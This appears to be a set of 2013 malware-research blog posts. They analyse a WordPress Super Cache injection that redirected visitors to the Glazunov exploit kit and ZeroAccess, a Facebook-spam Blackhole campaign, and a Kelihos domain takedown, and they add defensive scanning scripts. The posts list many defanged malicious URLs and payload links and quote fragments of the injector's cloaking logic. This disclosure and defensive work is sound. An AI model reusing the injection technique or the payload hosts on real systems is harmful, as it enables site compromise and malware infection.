Last Verified: 04/08/2013 12:00
Download hpHosts now! http://hosts-file.net/?s=Download

Thursday, 1 August 2013

"I dedicate this post to our members visiting Black Hat and DEF CON 2013, who are helping to represent our group in the security community, with deep regret that I could not make it there, no matter how badly I wanted to.
Thank you to @hugbomb, @set_abimone and @kafeine for the help in spotting the redirection, confirming the EK and flushing samples, and to @hFireF0X and the other Kernel Mode members for helping figure out and quickly mitigate the new version of ZeroAccess spotted in this threat!"

Background

I was told about an infection by our team's @hugbomb; I cleaned the site within 24 hours, after clearing my own neck of the woods.. :-)
I made a domestic report here -->>[0day.jp], and this is the post about how the malicious redirection was made.

The nature of the infection is that only Internet Explorer with the Java plugin is affected, and only on non-direct access. Some parts of the ACL-like logic used in this redirector are still being decoded, so we may report more of the features they use once that is 100% finished. If you meet the accepted conditions, you are redirected to the Glazunov exploit kit to be infected with the ZeroAccess/Sirefef malware. I had a hard time confirming this site, so I had to ask many friends to confirm the case and its conditions with some tests. The good thing is that the site's admin was very supportive, asked me to investigate properly, and allowed this post to be published to prevent more infections.

First, we have to be sure WHICH CODE was injected and WHERE:

Is that it?? Nope.. The diff shows more: during the injection session, these headers were added too:

1,9d0
< HTTP/1.1 200 OK
< Date: Mon, 29 Jul 2013 10:24:55 GMT
< Server: Apache
< X-Pingback: h00p://VICTIM.SITE/xmlrpc.php
< Set-Cookie: stats=446501053769c06c565094b26d26e8ef; expires=Mon, 29-Jul-2013 13:24:56 GMT
< Connection: close
< Content-Type: text/html; charset=UTF-8
< Content-Length: 61451
↑Note this: the header now sets a cookie named stats with an expiry date, which does not exist in normal mode.
OK, let's move on and look carefully at the breakdown of the injected code:

Explanation:

We see the JavaScript-tagged code and the use of a specific cookie. The user is first forced to call the landing page of the Glazunov exploit kit at the upper URL, then the browser components are checked using PluginDetect (note: version 0.8.1), and the Java exploitation path depends on the detected Java version.

If the Java version is 7, the JNLP-based infection via "buj58i7kc3.jnlp" is performed; otherwise the JAR class "weptblklaadp.nfpmuqaplgapmsrrmnranye.class" from "8.zip", a CVE-2013-1493 JAR exploit, is used directly. From my previous report here -->>[kernelmode.info] I know the payload is a new variant of the ZeroAccess/MaxPlus/Sirefef trojan.

Pictures of the infector components and CVE method used in the Jar(ZIP) infector

Spotting the infection source

So how was this code injected? That is the point of this post.
Please see the marked red part at the bottom of the picture above. It says:

<!-- WP Super Cache is installed but broken. 
The path to wp-cache-phase1.php
in wp-content/advanced-cache.php must be fixed! -->
I confirmed this with the site owner and found that this error wasn't supposed to happen.

I executed the first stage of checks by going through .htaccess, php.ini, default.php etc., found nothing suspicious, and went deeper to check the Apache modules in place, as well as the web server daemon used.
I went back to .htaccess and found myself staring at these lines:

RewriteCond %{DOCUMENT_ROOT}/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html -f
RewriteRule ^(.*) "/wp-content/cache/supercache/%{SERVER_NAME}/$1/index.html" [L]

OK, so the WordPress Super Cache plugin is running. Intrigued by the error caused by that same plugin, I dove into the plugin directories:

  :
2013/07/23 00:00 514 advanced-cache.php
2013/07/23 00:00 1,259 wp-cache-base.php
2013/07/23 00:00 2,988 wp-cache-config-sample.php
2013/07/23 00:00 25,524 wp-cache-phase1.php
2013/07/23 00:00 60,553 wp-cache-phase2.php
2013/07/23 00:00 180,031 wp-cache.php
2013/07/23 00:00 52,772 wp-super-cache.pot
:
This is just perfectly strange, since everything was installed on 2013/07/23 at exactly midnight :-)) lame..
Just to be sure, I made a detailed comparison with the original plugin:
I expected to find the size changes, but there were no differences in the code after I diffed them.. weird.. Which makes me think the attacker restored the files to normal after the injection was stored?

Let's see what we have now: a WP cache plugin error, strange plugin file dates, and injected code.

Going back to the injected code, I found that the obfuscation was built with Zend, and used that as the "significant" string to grep for the list of source files of the injected code:

Note: the yellow colour marks the files and their paths (all of them were injected in the first lines), and the green colour is the Zend framework builder similarity found.

Below is the list of these injectors:

wp-content\advanced-cache.php
wp-content\wp-cache-config.php
victim.site\wp-content\advanced-cache.php
victim.site\wp-content\wp-cache-config.php
And now we know why the error on the top page occurred! :-)

The attacker also injected code into the WordPress theme currently used by the victim; again, I pasted the "atahualpa" theme files injected with the malware code:

victim.site\wp-content\themes\atahualpa\comments-paged.php
victim.site\wp-content\themes\atahualpa\comments.php
victim.site\wp-content\themes\atahualpa\footer.php
victim.site\wp-content\themes\atahualpa\functions.php
victim.site\wp-content\themes\atahualpa\index.php
victim.site\wp-content\themes\atahualpa\legacy.comments.php
victim.site\wp-content\themes\atahualpa\searchform.php
Looking closely into each file we can guess WHEN the attacker replaced these files:

Understanding how the malicious code works..

Well, the code used to inject the pages is pasted as "safe" code here-->>[PASTEBIN]
The first level of obfuscation extracted from the code is here-->>[PASTEBIN]
Note (AGAIN): the code is for viewing only and cannot be executed, a.k.a. I "hexed" the code.

Following the decoded one, at the line numbers below you'll see this code:

It shows the regex operation that grabs and replaces the original contents and inserts the injection code, assembled around the <BODY and </HTML tags (marked in purple). Note that all of this is made possible by the abuse of the WordPress plugin mentioned.

I tried to decode further by hand and found two similar obfuscation blocks, each containing these parts, with the logic below:

Obfuscation block...

Decoder..

Parser of the decoded codes..

Well, the above code is a rough copy-paste from my notepad; all you have to do next is grab the blob of data, modified a bit as those morons wanted, decode it using the logic seen in the decoder parts, and parse it out.

I tried to follow the flow of the code manually, using only a text editor, but it looks like things went off the rails somewhere.. So I got stuck at the final decode status here -->>[PASTEBIN]

During the manual decoding of the blob, some interesting results showed up:

Exclusion of user agents...

$user_agents = array ("Google",
"Slurp",
"MSNBot",
"ia_archiver",
"Yandex",
"Rambler"
[...]
The check on the user-agent and the stats cookie that gates the redirection to the exploit kit URL...
if((preg_match("/".
implode("|", $user_agents)."/i",
$_SERVER['HTTP_USER_AGENT'])) or
( isset($_COOKIE['stats'])))
At this point I realised that more de-obfuscation effort would take more time and energy (I would have to start from the beginning all over again), which I don't have right now, not on weekdays. So I reproduced the injection source script in PHP on a WP test server to get the injection code, as pasted here, bit by bit in text -->>[PASTEBIN]
Note that the path of the exploit kit and the name of the zip/JAR file have changed. The code is hexed as well.

I will look further to finish the decoding this weekend; I hope this write-up helps people who got hit by the same threat. Feel free to ask me questions in the comments section of this post.
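Two pieces of the analysis above lend themselves to code. The Python below is an added example and not the post's or the plugin's own code: serves_exploit_redirect reconstructs the server-side gate from the decoded PHP (my reading of it: crawlers in $user_agents and any visitor already carrying the stats cookie are skipped, which is why one-off fetches by a researcher can miss the injection), and scan_plugin_tree does what the diff against the original plugin did by hand, flagging files that differ from a pristine copy of the same version, files whose first line differs (where the loader was injected), files with no pristine counterpart, and files whose mtime sits exactly on midnight. The plugin tree is a constructed fixture in a temp directory; the file contents are stand-ins, not WP Super Cache source, and the crawler list is only the part recovered above.

```python
import hashlib
import os
import re
import tempfile
from datetime import datetime

# (a) Cloaking gate reconstructed from the decoded injector. Crawler strings are the
# ones recovered above; the real list may be longer.
CRAWLER_UA = ["Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler"]
_CRAWLER_RE = re.compile("|".join(map(re.escape, CRAWLER_UA)), re.I)


def serves_exploit_redirect(user_agent, cookies):
    """Server-side decision only: skip the redirect for crawlers and for visitors who
    already carry the `stats` cookie (set on the first hit, see the Set-Cookie header).
    The IE/Java requirement is enforced later, client-side, by PluginDetect."""
    if _CRAWLER_RE.search(user_agent or ""):
        return False
    if "stats" in cookies:
        return False
    return True


# (b) Integrity pass: deployed plugin directory vs. a pristine copy of the same version.
def _sha256(path):
    h = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def _first_line(path):
    with open(path, "rb") as fh:
        return fh.readline()


def scan_plugin_tree(deployed, pristine):
    """Return {relative_path: [flags]} for every deployed file that is absent from the
    pristine copy, differs in content, differs in its FIRST line (the injection point
    seen above), or has an mtime of exactly 00:00:00 local time."""
    findings = {}
    for root, _dirs, names in os.walk(deployed):
        for name in names:
            dpath = os.path.join(root, name)
            rel = os.path.relpath(dpath, deployed)
            ppath = os.path.join(pristine, rel)
            flags = []
            if not os.path.isfile(ppath):
                flags.append("not-in-pristine")
            elif _sha256(dpath) != _sha256(ppath):
                flags.append("content-differs")
                if _first_line(dpath) != _first_line(ppath):
                    flags.append("first-line-differs")
            mtime = datetime.fromtimestamp(os.stat(dpath).st_mtime)
            if (mtime.hour, mtime.minute, mtime.second) == (0, 0, 0):
                flags.append("midnight-mtime")
            if flags:
                findings[rel] = flags
    return findings


def build_demo_tree():
    """Constructed fixture (not the real plugin): a pristine copy and a deployed copy in
    which advanced-cache.php gained a stand-in loader on its first line, a
    wp-cache-config.php appeared, and every deployed file's mtime was reset to
    2013-07-23 00:00:00 local time, mirroring the listing in the post."""
    base = tempfile.mkdtemp(prefix="wpsc-")
    pristine = os.path.join(base, "pristine")
    deployed = os.path.join(base, "deployed")
    files = {
        "advanced-cache.php": "<?php\n// stand-in for WP Super Cache advanced-cache\n",
        "wp-cache-phase1.php": "<?php\nfunction wp_cache_phase1() {}\n",
        "wp-cache-config-sample.php": "<?php\n$cache_enabled = true;\n",
    }
    for d in (pristine, deployed):
        os.makedirs(d)
        for name, body in files.items():
            with open(os.path.join(d, name), "w") as fh:
                fh.write(body)
    with open(os.path.join(deployed, "advanced-cache.php"), "w") as fh:
        fh.write("<?php /* stand-in for the obfuscated loader */\n" + files["advanced-cache.php"])
    with open(os.path.join(deployed, "wp-cache-config.php"), "w") as fh:
        fh.write("<?php\n$cache_enabled = true;\n")
    midnight = datetime(2013, 7, 23, 0, 0, 0).timestamp()
    for name in os.listdir(deployed):
        os.utime(os.path.join(deployed, name), (midnight, midnight))
    return deployed, pristine


if __name__ == "__main__":
    d, p = build_demo_tree()
    for path, flags in sorted(scan_plugin_tree(d, p).items()):
        print(path, flags)
```

On a real case, point scan_plugin_tree at the live wp-content directory and at a fresh download of the same plugin version from wordpress.org. Files such as wp-cache-config.php are generated by the plugin and will always show up as not-in-pristine, so that flag needs a human look; first-line-differs on a file that should start with a bare <?php is the strong signal here, and a whole directory sharing one midnight mtime is the clue that the attacker reset timestamps after the swap.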

Additional:

Our members found traces of similar obfuscation, presumably from previous attacks. So it is in the wild..

Moral of the Story

This threat is harmful, as harmful and nasty as a rogue Apache module or a rogue web server: WordPress Super Cache provides every tool needed to make the redirection, control the access, grab the HTTP request and change and parse it into a malicious one in a snap.. And better yet, it is easy for a hacker to implement. I mean, all they do is make sure you have an old version of WP Super Cache (which can be found out by remote HTTP checks), brute-force (or buy) your (stolen) FTP account (somehow), and things like I posted here will happen. The attacker doesn't even need to hack your Apache modules, and needs no root permission to replace web-server-related system files, thus not leaving many traces (i.e. no .htaccess, no php.ini, no default.php, no strange conf to touch..), and a successful attacker can camouflage their code like a needle in a haystack. And note, this is a real IR case, friend.. a PoC of what we should be more aware of in this threat.

I hope all WP users become as aware of the security risk of the useful plugins they use as they are of their usefulness. Keep your CMS and its plugins up to date, change your FTP server password regularly (I don't say often), and your risk of having a hacked server like this will be minimized.

Stay safe friends!

#MalwareMustDie!!

Tuesday, 30 July 2013

Just when you thought it couldn't get stupider than Cameron's imposing of the smut ban in the UK, this Russian politico has decided to out-do Cameron in the "yep, we can be even more brainless!".

http://www.theregister.co.uk/2013/07/29/russia_to_ban_swearing_on_social_networks_good_luck/

This woman has clearly never seen some of the Russian and Ruskranian blackhat forums I monitor (or for that

Thursday, 25 July 2013

Looking up the POST beep codes for a Sony Vaio led me to a thread on sevenforums.com a few minutes ago, which rather disgustingly (I'd say surprisingly, but I'm not surprised by SysTweak's ongoing badness anymore; they've been at it so long) led to 4 more examples of misleading advertising, one belonging to Spark Trust and 3 others belonging to SysTweak.

The first [1] of these is at least
Note: I wrote this post as a quick note to raise awareness of this threat, as a warning for Facebook users and as a PoC to be used as a verdict for shutting down the related domain and IP, so I am sorry if you do not find any deep analysis this time.

We received tons of fake Facebook notification email spam following three theme patterns: (1) asking you about Facebook password changes, (2) a "Your photo was tagged" notification and (3) a friend request notification. I made snapshots of these three as per below (please click to enlarge the pictures):

These emails trick you into clicking the malware infection URLs below; I pasted only the recent ones:

h00p://198.251.67.11/sonya/index.html
h00p://www.kauai2u.com/hiding/index.html
h00p://nendt.com/horded/index.html
h00p://whittakerwatertech.com/hewed/index.html
h00p://www.readingfluency.net/demising/index.html
h00p://adeseye.me.pn/saluted/index.html
h00p://www.bst-kanzlei.de/gist/index.html
h00p://www.discountprescriptions.pacificsocial.com/signally/index.html

What happens after you access those URLs is that you load the malicious JavaScript at the URL below:

h00p://traditionlagoonresort.com/prodded/televised.js
and you will then be redirected to the Blackhole Exploit Kit site here:
h00p://nphscards.com/topic/accidentally-results-stay.php
The browser will look like this upon redirection...

If we follow this threat further we meet Trojan Zbot/Pony (credential stealer), MedFos (downloader) and the ZeroAccess botnet, all served by this Blackhole instance.
The same infection chain leading to the same URL was also verdicted malicious here-->>[CLICK]
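As an added example (my code, not something from the original post or from MalwareMustDie), the chain above can be turned into a small proxy-log triage: the Blackhole landing URL shape seen on this host (/topic/<word>-<word>-<word>.php, or the same with underscores), the .htc helper file and the fake update_flash_player.exe payload name become indicators, and hits are grouped by server IP, which is the unit an abuse report to the hosting provider is written about. The URLQuery-style line layout, the indicator names and the sample log (five lines taken from this post's listing plus one constructed benign line) are my assumptions.

```python
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set, Tuple
from urllib.parse import urlparse

# Indicators taken from the chain described in the post. The names are mine.
BLACKHOLE_LANDING = re.compile(r"^/topic/[a-z]+[-_][a-z]+(?:[-_][a-z]+)?\.php$")
FAKE_FLASH_UPDATER = re.compile(r"/update_flash_player\.exe$")
HTC_HELPER = re.compile(r"\.htc$")

# One URLQuery-style line: "<timestamp> <url> [<country>] <ip>" (assumed layout).
URLQUERY_LINE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) (?P<url>\S+) "
    r"\[(?P<country>[^\]]+)\] (?P<ip>\d{1,3}(?:\.\d{1,3}){3})$"
)


def refang(url: str) -> str:
    """Turn the defanged h00p:// or hxxp:// spelling used in the post back into http://."""
    return re.sub(r"^h(?:00|xx)p(s?)://", r"http\1://", url, flags=re.IGNORECASE)


def classify(url: str) -> Optional[str]:
    """Return an indicator name for a URL, or None if nothing in the path matches.

    Only the path is inspected: Blackhole appends random query strings
    (?If=...&Se=...) that would defeat an exact-URL blocklist.
    """
    path = urlparse(refang(url)).path
    if BLACKHOLE_LANDING.match(path):
        return "blackhole-landing"
    if FAKE_FLASH_UPDATER.search(path):
        return "fake-flash-updater"
    if HTC_HELPER.search(path):
        return "htc-helper"
    return None


def scan(lines: List[str]) -> List[Tuple[str, str, str, str]]:
    """Parse URLQuery-style lines and keep only those matching an indicator.

    Each hit is (timestamp, ip, hostname, indicator). Unparseable lines are skipped.
    """
    hits = []
    for line in lines:
        m = URLQUERY_LINE.match(line.strip())
        if not m:
            continue
        verdict = classify(m["url"])
        if verdict is None:
            continue
        host = urlparse(refang(m["url"])).hostname or ""
        hits.append((m["ts"], m["ip"], host, verdict))
    return hits


def hosts_by_ip(hits: List[Tuple[str, str, str, str]]) -> Dict[str, Set[str]]:
    """Group hostnames per server IP, the unit a hosting-provider abuse report covers."""
    groups = defaultdict(set)
    for _ts, ip, host, _verdict in hits:
        groups[ip].add(host)
    return dict(groups)


# Constructed sample log: five lines from this post's URLQuery listing plus one
# benign line (example.invalid, RFC 2606) to show a non-hit.
SAMPLE_LOG = """\
2013-07-25 12:25:54 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 01:07:51 h00p://nphssoccercards.com/favicon.ico [United States] 162.216.18.169
2013-07-25 01:05:34 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc [United States] 162.216.18.169
2013-07-25 01:03:43 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-24 19:33:18 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53 [United States] 162.216.18.169
2013-07-24 19:00:00 h00p://example.invalid/index.html [United States] 192.0.2.10
""".splitlines()


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for ts, ip, host, verdict in found:
        print(f"{ts} {ip:<16} {host:<24} {verdict}")
    for ip, hosts in hosts_by_ip(found).items():
        print(f"report {ip}: {', '.join(sorted(hosts))}")
```

Matching on the path shape rather than the full URL is deliberate: the kit rotates the query string per visitor, so the exact URLs in the listings above are useless as a blocklist within hours, while the /topic/ three-word .php layout stayed stable across both domains on this host.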

The Blackhole host itself is up and alive at the domain and name servers below:

nphscards.com  A  162.216.18.169
nphscards.com NS ns30.domaincontrol.com
nphscards.com NS ns29.domaincontrol.com
You will see a long record of infections from this IP as spotted in URLQuery here-->>[CLICK], pasted below:
2013-07-25 12:25:54 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 09:30:28 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 08:33:34 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 02:38:35 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-25 01:07:51 h00p://nphssoccercards.com/favicon.ico [United States] 162.216.18.169
2013-07-25 01:05:34 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc [United States] 162.216.18.169
2013-07-25 01:03:43 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:15:33 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-25 00:12:25 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-25 00:11:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-25 00:04:06 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 23:43:58 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:49:27 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 22:14:26 h00p://nphssoccercards.com/adobe/update_flash_player.exe [United States] 162.216.18.169
2013-07-24 22:02:13 h00p://2013vistakonpresidentsclub.com/ [United States] 162.216.18.169
2013-07-24 21:50:46 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 21:47:23 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 20:03:35 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:40:30 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 19:33:18 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53 (...) [United States] 162.216.18.169
2013-07-24 18:56:07 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfP (...) [United States] 162.216.18.169
2013-07-24 18:53:14 h00p://nphssoccercards.com [United States] 162.216.18.169
2013-07-24 18:25:56 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 18:13:21 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:53:12 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php [United States] 162.216.18.169
2013-07-24 17:17:24 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:40:13 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 16:29:31 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 13:18:30 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
2013-07-24 12:29:44 h00p://nphscards.com/topic/accidentally-results-stay.php [United States] 162.216.18.169
It can also be seen in the VirusTotal URL check here-->>[CLICK], pasted below:
5/39 2013-07-25 09:17:49 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?ilhtELOHdpisFWs=YgItFHLgkO&JJfLXzq...
3/39 2013-07-25 07:05:13 h00p://2013vistakonpresidentsclub.com/topic/religiouss-selected.php
8/39 2013-07-25 06:05:45 h00p://nphssoccercards.com/adobe/update_flash_player.exe
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ceJfcWErQTbG=kCwAByXBRdETOJ&tsDWPg=Rp...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?Ff=5656562e2i&Ce=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?jf=32542d2e2d&Be=2d2i562g552g2f572i54...
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?TbcoUkQBgX=hGSiu&qhiHoQj=JBEYjg
4/39 2013-07-25 04:58:59 h00p://nphscards.com/topic/accidentally-results-stay.php?ff=2g3131542j&ke=302g572f5352572i572f...
3/39 2013-07-25 04:01:30 h00p://nphscards.com/topic/accidentally-results-stay.php%27%3B
3/39 2013-07-25 03:49:25 h00p://2013vistakonpresidentsclub.com/topic/operation_statistic_objects.php
5/39 2013-07-25 01:22:26 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2e542f5452&ae=302g572f5352572i5...
5/39 2013-07-25 01:21:06 h00p://nphssoccercards.com/contacts.exe
5/38 2013-07-24 23:07:28 h00p://nphssoccercards.com/ubi/template/identity/lib/style-nurse.htc
8/38 2013-07-24 21:40:20 h00p://nphscards.com/adobe/update_flash_player.exe
7/39 2013-07-24 21:19:11 h00p://2013vistakonpresidentsclub.com/topic/regard_alternate_sheet.php
2/38 2013-07-24 21:03:03 h00p://2013vistakonpresidentsclub.com/
4/39 2013-07-24 18:58:16 h00p://nphscards.com/topic/accidentally-results-stay.php
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Rf=322e2i542f&fe=302g572f5352572i5...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?Kf=322e2i542f&xe=522e552d57552f305...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?If=2d2i2g302g&Se=302g572f53525...
4/39 2013-07-24 18:16:45 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?KYdttLYSrKSgb=BcaETwRFtxefjW&UAoFL...
4/39 2013-07-24 18:05:46 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToik=52...
3/39 2013-07-24 17:20:55 h00p://nphssoccercards.com/adobe/adobe_files/mhtB264%281%29.tmp
2/39 2013-07-24 17:18:51 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php
2/39 2013-07-24 17:16:40 h00p://nphssoccercards.com/
2/39 2013-07-24 17:00:10 h00p://nphssoccercards.com/adobe/
2/39 2013-07-24 16:58:25 h00p://nphssoccercards.com/topic/regard_alternate_sheet.php?iKoOp=572h322i55&wQrxKfxXfPToi...
2/39 2013-07-24 16:53:57 h00p://nphscards.com/
4/38 2013-07-24 16:18:14 h00p://nphscards.com/topic/accidentally-results-stay.php?mf=542h2i312h&Me=302g572f5352572i572f...
2/39 2013-07-24 15:18:08 h00p://nphssoccercards.com/forum/viewtopic.php
2/38 2013-07-24 15:07:48 h00p://nphssoccercards.com/topic/religiouss-selected.php
4/38 2013-07-23 23:10:24 h00p://nphscards.com/adobe
More spotted malware infection: more information on the "Royal Baby" scam is here-->>[Malekal]

Domain and IP Network information:

Below is the registrar and ISP information for this infector's domain and IP:

// Domains & IP registration (for shutdown purposes)
// GoDaddy domain hosted in the Linode network

Domain Name: NPHSCARDS.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS29.DOMAINCONTROL.COM
Name Server: NS30.DOMAINCONTROL.COM
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 05-oct-2012
Creation Date: 10-oct-2010
Expiration Date: 10-oct-2013

NetRange: 162.216.16.0 - 162.216.19.255
CIDR: 162.216.16.0/22
OriginAS:
NetName: LINODE-US
NetHandle: NET-162-216-16-0-1
Parent: NET-162-0-0-0-0
NetType: Direct Allocation
RegDate: 2013-06-19
Updated: 2013-06-19
Ref: http://whois.arin.net/rest/net/NET-162-216-16-0-1

OrgName: Linode
OrgId: LINOD
Address: 329 E. Jimmie Leeds Road
Address: Suite A
City: Galloway
StateProv: NJ
PostalCode: 08205
Country: US
RegDate: 2008-04-24
Updated: 2010-08-31
Comment: http://www.linode.com
Ref: http://whois.arin.net/rest/org/LINODE
Yes, we need GoDaddy's cooperation to dismantle this domain to prevent further infection, and Linode's cooperation to clean up the host.

If you are interested in the investigation log, you can fetch it here-->>[Download]

Additional

The campaign still goes on, even now:

#MalwareMustDie!

Wednesday, 24 July 2013

MalwareMustDie, NPO, during its research activities, treats the suspension of malicious domains as an important milestone in the malware-fighting process, and also publicly releases some of the suspended domains in "Operation Tango Down" [What is TangoDown?] as a public announcement.

This time we are shutting down the 97 .RU domains used as Kelihos Trojan payload download servers, distributed by the RedKit Exploit Kit. We registered all of the detected payload URLs in URLQuery and, once all the data was registered, summarized the URLs used for infection by automation. We thank URLQuery for providing a good service that is helpful as evidence of crime for the further legal process. In this case we detected 150 infection URLs under 97 .RU domains; some of the URLs are served under subdomains. The use of DGA-like randomization for the payload domains is the MO of this distribution.

The Kelihos Trojan was distributed (mainly) from East European (Ukrainian, Latvian, Belarusian, Russian) and Asian (Japanese, Korean, Taiwanese and Hong Kong) servers as the secondary layer, also using hacked machines scattered worldwide.

Verdict of Crime

The current report documents a systematic and successful suspension process, a good coordination between MalwareMustDie members and supporters who helped spot, analyse and report the threat, our PiCs in the Tango Team (thanks to @DL for the hard work during holiday time) and Group-IB, who performed an excellent coordination of the suspension process with the related Russian registrar (REGGI.RU). Overall the communication and confirmation process took 4+ days.

This wave of the RedKit Exploit Kit campaign using Kelihos as payload was spotted infecting worldwide; with the help of our Japan team we have strong evidence of this infection effort, as published in Operation Clean-up Japan (OCJP) case #113 here-->>[OCJP-013], on five domestic sites.

The infection payloads are as per the real samples captured below:

RedKit Redirection PoC Snapshot:
[1] [2] [3] [4] [5]

Based on the payloads above we sought out and collected all of the payload servers for this shutdown.

Tango Information

The payload URLs are in the long list below, followed by another long list of the 97 dismantled domains:

Infection URL data:

// #MalwareMustDie! Kelihos payload URL via RedKit EK Infection
// Reference: http://unixfreaxjp.blogspot.jp/2013/07/ocjp-113redkit-exploit-kitkelihosvia.html
// Detection range: July 1st, 2013 - July 16, 2013
//

// grep rasta*

0 / 3 [7]hxxp://131.155.81.158/rasta01.exe Netherlands 131.155.81.158
0 / 6 [8]hxxp://fuhxodyz.ru/rasta01.exe Belarus 93.125.67.95
0 / 0 [9]hxxp://www.philchor-nb.de/demo/rasta01.exe Germany
0 / 2 [10]hxxp://ikqydkod.ru/rasta01.exe Ukraine 109.251.141.23
0 / 2 [11]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Russian Federation
0 / 6 [12]hxxp://bopefidi.ru/rasta01.exe Russian Federation 2.94.27.238
0 / 2 [13]hxxp://ycsycxyd.ru/rasta01.exe Ukraine 46.119.193.89
0 / 2 [14]hxxp://sojouvyc.ru/rasta01.exe Ukraine 31.128.74.7
0 / 2 [15]hxxp://vadlubiq.ru/rasta01.exe Ukraine 109.162.84.6
0 / 2 [16]hxxp://kazlyjva.ru/rasta01.exe Malaysia 58.26.182.98
0 / 2 [17]hxxp://funfubap.ru/rasta01.exe Taiwan 114.35.239.185
0 / 2 [18]hxxp://goryzcob.ru/rasta01.exe Ukraine 109.87.254.247
0 / 2 [19]hxxp://motbajsi.ru/rasta01.exe Ukraine 91.196.61.56
0 / 6 [20]hxxp://xymkapaq.ru/rasta01.exe Latvia 89.201.53.86
0 / 2 [21]hxxp://hupjiwuc.ru/rasta01.exe Ukraine 195.114.156.254
0 / 6 [22]hxxp://runevfoh.ru/rasta01.exe Ukraine 5.248.34.57
0 / 2 [23]hxxp://virerceb.ru/rasta01.exe Argentina 190.227.181.203
0 / 6 [24]hxxp://xatzyjha.ru/rasta01.exe Taiwan 1.172.233.239
0 / 2 [25]hxxp://makgivus.ru/rasta01.exe Canada 99.250.218.131
0 / 2 [26]hxxp://avryjpet.ru/rasta01.exe Belarus 91.215.178.83
0 / 2 [27]hxxp://kyjaqcoz.ru/rasta01.exe Ukraine 213.231.52.44
0 / 2 [28]hxxp://bopefidi.ru/rasta01.exe Taiwan 111.255.72.1
0 / 6 [29]hxxp://ycsycxyd.ru/rasta01.exe Japan 118.104.77.165
0 / 2 [30]hxxp://gazgowry.ru/rasta01.exe Ukraine 77.122.55.112
0 / 2 [31]hxxp://vetarwep.ru/rasta01.exe Kazakhstan 176.222.169.243
0 / 6 [32]hxxp://aro0eq.hozfezbe.ru/rasta01.exe Bulgaria 95.43.87.30
0 / 6 [33]hxxp://gulaxxax.ru/rasta01.exe Ukraine 31.42.69.61
0 / 6 [34]hxxp://onhugxic.ru/rasta01.exe Kazakhstan 109.239.45.48
0 / 2 [35]hxxp://ahfamzyk.ru/rasta01.exe Ukraine 178.150.33.194
0 / 6 [36]hxxp://sykevked.ru/rasta01.exe Ukraine 151.0.44.52
0 / 6 [37]hxxp://ydhicdor.ru/rasta01.exe Ukraine 78.30.249.126
